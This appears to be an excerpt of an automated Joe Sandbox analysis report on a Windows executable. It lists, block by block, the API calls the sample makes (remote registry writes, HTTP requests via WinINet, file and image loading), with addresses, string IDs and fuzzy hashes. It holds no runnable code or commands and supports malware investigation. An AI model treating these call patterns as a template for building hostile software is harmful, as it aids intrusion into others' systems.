                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 006D0EE4
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006D0F13
                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D0F35
                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D0F47
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D0F6E
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0F75
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D0F7E
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0F85
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D0F8E
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0F95
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006D0FA1
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0FA8
                                                                                                                                                                                                                                                                  • Part of subcall function 006D1193: GetProcessHeap.KERNEL32(00000008,006D0BB1,?,00000000,?,006D0BB1,?), ref: 006D11A1
                                                                                                                                                                                                                                                                  • Part of subcall function 006D1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,006D0BB1,?), ref: 006D11A8
                                                                                                                                                                                                                                                                  • Part of subcall function 006D1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006D0BB1,?), ref: 006D11B7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                • Opcode ID: 928871adc3f51b7526fb8d6638c58b74363bd9261a757b87d7939d2bfc9b4315
                                                                                                                                                                                                                                                                • Instruction ID: 836f0e3bb80143aba7e723c97debb08c8034f8066f5400fb9399bd3ebf8f046e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 928871adc3f51b7526fb8d6638c58b74363bd9261a757b87d7939d2bfc9b4315
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8716F72D0020AEBEF21DFA4DC49FEEBBB9BF05300F148216F915A6291DB759905CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006FC4BD
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0070CC08,00000000,?,00000000,?,?), ref: 006FC544
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 006FC5A4
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FC5F4
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FC66F
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 006FC6B2
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 006FC7C1
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 006FC84D
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 006FC881
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 006FC88E
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 006FC960
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                • Opcode ID: 7194a52d57da28afef772896ad096087021a2de4497657d1417f45e8af9253a1
                                                                                                                                                                                                                                                                • Instruction ID: d502c211b537eb71d196fb8d3a3192a2754ec1e8f5f39ec74323159bec38a47e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7194a52d57da28afef772896ad096087021a2de4497657d1417f45e8af9253a1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3127A352042059FDB54DF24C981E6ABBE6FF88724F14885CF95A9B3A2DB31EC41CB85
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 007009C6
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00700A01
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00700A54
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00700A8A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00700B06
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00700B81
                                                                                                                                                                                                                                                                  • Part of subcall function 0068F9F2: _wcslen.LIBCMT ref: 0068F9FD
                                                                                                                                                                                                                                                                  • Part of subcall function 006D2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006D2BFA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                • Opcode ID: 12fa7edd9e623404519a0025117f33da2dbd51a880fec528de1c63e729ff74b1
                                                                                                                                                                                                                                                                • Instruction ID: 306b09a6e2f24b963d4c380a53561e7afd80b490e0f28e1792780382172332dd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12fa7edd9e623404519a0025117f33da2dbd51a880fec528de1c63e729ff74b1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07E1AE71208301DFC754DF24C450A2AB7E2BF98324F148A5DF89A9B3A2DB38ED45CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                • Opcode ID: 15a59103e9784133d0b0560c6d09221a85c2b49145686ff508be85c978b66bd0
                                                                                                                                                                                                                                                                • Instruction ID: a3196f16ff9bd80926c90e57bcc90088531d5bdbd10ef4fbc72a38f88ea86990
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a59103e9784133d0b0560c6d09221a85c2b49145686ff508be85c978b66bd0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB71F27260012E8BCB20DE7CCA519FA3397AFA0774F214528FA6697385EA35DD45C3A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0070835A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0070836E
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00708391
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 007083B4
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007083F2
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0070361A,?), ref: 0070844E
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00708487
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007084CA
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00708501
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0070850D
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0070851D
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0070852C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00708549
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00708555
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                • Opcode ID: 0e057f0269ad623b7d87102cfe6b77bb6ba620d822a9fd106360663c0cebab71
                                                                                                                                                                                                                                                                • Instruction ID: 678b275b1f108bc1f449337ece912b9545d1d8d8ddda8db9439918338ec9ad86
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e057f0269ad623b7d87102cfe6b77bb6ba620d822a9fd106360663c0cebab71
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C461EE71500219FAEB54CF64CC81BBE77ACBB08B21F108709F855D61D1DFB8AA91CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006900C6
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0074070C,00000FA0,F4491903,?,?,?,?,006B23B3,000000FF), ref: 0069011C
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006B23B3,000000FF), ref: 00690127
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006B23B3,000000FF), ref: 00690138
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0069014E
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0069015C
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0069016A
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00690195
                                                                                                                                                                                                                                                                  • Part of subcall function 006900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006901A0
                                                                                                                                                                                                                                                                • ___scrt_fastfail.LIBCMT ref: 006900E7
                                                                                                                                                                                                                                                                  • Part of subcall function 006900A3: __onexit.LIBCMT ref: 006900A9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • InitializeConditionVariable, xrefs: 00690148
                                                                                                                                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00690122
                                                                                                                                                                                                                                                                • SleepConditionVariableCS, xrefs: 00690154
                                                                                                                                                                                                                                                                • kernel32.dll, xrefs: 00690133
                                                                                                                                                                                                                                                                • WakeAllConditionVariable, xrefs: 00690162
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                • Opcode ID: 28104ff3620a2ec61c26e1337d78d4201518cc95c3e35147db0697054c875466
                                                                                                                                                                                                                                                                • Instruction ID: 1d74f1f66d9a00a7c08c56f118d28354d55c5a508f631c4209af495d7c6e6e32
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28104ff3620a2ec61c26e1337d78d4201518cc95c3e35147db0697054c875466
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7821DA72644710EFFF225BB4AC09B6937D9DB05B61F14432AF901A2AD1DF7858008A99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(00000000,00000000,0070CC08), ref: 006E4527
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006E453B
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006E4599
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006E45F4
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006E463F
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006E46A7
                                                                                                                                                                                                                                                                  • Part of subcall function 0068F9F2: _wcslen.LIBCMT ref: 0068F9FD
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,00736BF0,00000061), ref: 006E4743
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                • Opcode ID: 613d9d7945c2115d3bc0e90f52539de0c36061d26d02d59e7663851585464bb6
                                                                                                                                                                                                                                                                • Instruction ID: 4358a9c1b0e613d9d106cf324919749ce16a9b165629012781b1015b8fac889d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 613d9d7945c2115d3bc0e90f52539de0c36061d26d02d59e7663851585464bb6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AB1F4716093429FC710DF39C8909AAB7E6BFA5720F508A1DF496C7391EB30D845CBA2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 00706DEB
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00706E5F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00706E81
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00706E94
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00706EB5
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00670000,00000000), ref: 00706EE4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00706EFD
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00706F16
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00706F1D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00706F35
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00706F4D
                                                                                                                                                                                                                                                                  • Part of subcall function 00689944: GetWindowLongW.USER32(?,000000EB), ref: 00689952
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                • Opcode ID: 1e43481e1d4e52d8b9d93997ab649c74df8d4334a4e4260234bada270ad0445c
                                                                                                                                                                                                                                                                • Instruction ID: db5c046a0f1a0c83a11a0a61f0605d3c5278f525b9ac6afd20dd6fce8de2f7e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e43481e1d4e52d8b9d93997ab649c74df8d4334a4e4260234bada270ad0445c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2719974100341EFDB21DF18DC54EAABBE9FB89300F444A1EF989872A1CB79E956CB15
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006EC4B0
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006EC4C3
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006EC4D7
                                                                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006EC4F0
                                                                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 006EC533
                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006EC549
                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006EC554
                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006EC584
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006EC5DC
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006EC5F0
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 006EC5FB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 89c763eb7f0c2b632a4f80c5030ca9aec357e0616ee0081af24e7dd655ebf6c2
                                                                                                                                                                                                                                                                • Instruction ID: aa9acb23e9a288607340cac32de04122cec3343b3b36e12a8487a0869bb40499
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89c763eb7f0c2b632a4f80c5030ca9aec357e0616ee0081af24e7dd655ebf6c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B518DB1101348FFDB229F62C948AAB7BFDFF08364F00861AF94596250DB34E9159F60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00708592
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 007085A2
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 007085AD
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 007085BA
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 007085C8
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007085D7
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 007085E0
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 007085E7
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007085F8
                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0070FC38,?), ref: 00708611
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00708621
